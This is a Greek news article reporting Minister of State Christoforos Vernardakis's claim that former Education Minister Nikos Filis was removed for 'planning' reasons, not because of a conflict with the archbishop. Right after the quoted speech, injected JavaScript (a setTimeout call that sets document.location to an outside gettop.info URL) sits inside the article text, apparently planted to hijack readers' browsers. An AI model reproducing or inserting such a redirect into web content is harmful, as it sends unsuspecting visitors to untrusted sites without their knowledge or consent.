Βερναρδάκης για απομάκρυνση Φίλη: Δεν έφυγε γιατί συγκρούστηκε… αλλά λόγω σχεδιασμού

0
5

 

Για την απομάκρυνση του τέως υπουργού Παιδείας Νίκου Φίλη μίλησε σε εκδήλωση που διοργάνωσε η εφημερίδα «Εποχή» στη Θεσσαλονίκη με θέμα :»μετά το Συνέδριο τι;» ο υπουργός Επικρατείας και στενός συνεργάτης του πρωθυπουργού, Χριστόφορος Βερναρδάκης.

Όπως ανέφερε απαντώντας σε παρατήρηση του μέλους της πολιτικής γραμματείας Πάνου Λάμπρου, αλλά και σε τοποθετήσεις άλλων ομιλητών και παρευρισκομένων, ότι σε ορισμένες περιπτώσεις, όπως του Ν. Φίλη, οι αλλαγές στην κυβέρνηση, ασχέτως εάν οι διάδοχοι τους ακολουθήσουν την ίδια πολιτική, είναι πιθανόν να στέλνουν την εντύπωση «στην κοινωνία, ότι ο ΣΥΡΙΖΑ κάνει πίσω» ο κ. Βερναρδάκης τόνισε:

«Ο Φίλης δεν έφυγε γιατί συγκρούστηκε, γιατί απαίτησε κάποιος από τον Τσίπρα και μάλιστα ο αρχιεπίσκοπος, να φύγει» και πρόσθεσε : «Σίγουρα δεν έφυγε, γιατί δεν έκανε καλή δουλειά στο υπουργείο, όπως και το ίδιο ισχύει για τον σύντροφο και συνάδελφο και αγαπητό φίλο Νίκο Παρασκευόπουλο. Ξέρετε, υπάρχουν ζητήματα σχεδιασμού, που μας ξεπερνάνε πολλές φορές και ξεπερνάνε και τις ατομικές μας απόψεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here